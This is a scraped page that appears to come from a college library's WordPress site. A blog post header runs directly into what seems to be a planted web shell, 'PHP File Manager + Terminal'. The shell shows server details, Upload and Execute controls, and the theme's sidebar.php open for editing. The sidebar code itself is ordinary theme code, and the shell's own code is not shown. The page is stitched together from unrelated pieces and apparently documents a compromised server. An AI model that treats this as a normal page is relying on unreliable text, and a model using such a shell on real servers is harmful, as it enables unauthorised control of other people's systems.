Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/library/wp-content/themes/mobius Upload Create File Create Folder Execute Editing: /var/www/html/library/wp-content/themes/mobius/sidebar.php<?php /*-----------------------------------------------------------------------------------*/ /* Sidebar containing the primary blog sidebar /*-----------------------------------------------------------------------------------*/ $post_wide = get_post_meta($post->ID, "sidebars", $single = true) == "false"; if ( is_home() && !of_get_option('hide_bloghome_sidebar') ) { // continue } elseif (is_single() && $post_wide ) { return; } elseif ( is_archive() || is_category() ) { // continue } if ( is_active_sidebar('primary-widget-area')) : do_action('st_before_sidebar'); dynamic_sidebar( 'primary-widget-area' ); do_action('st_after_sidebar'); endif; ?> Save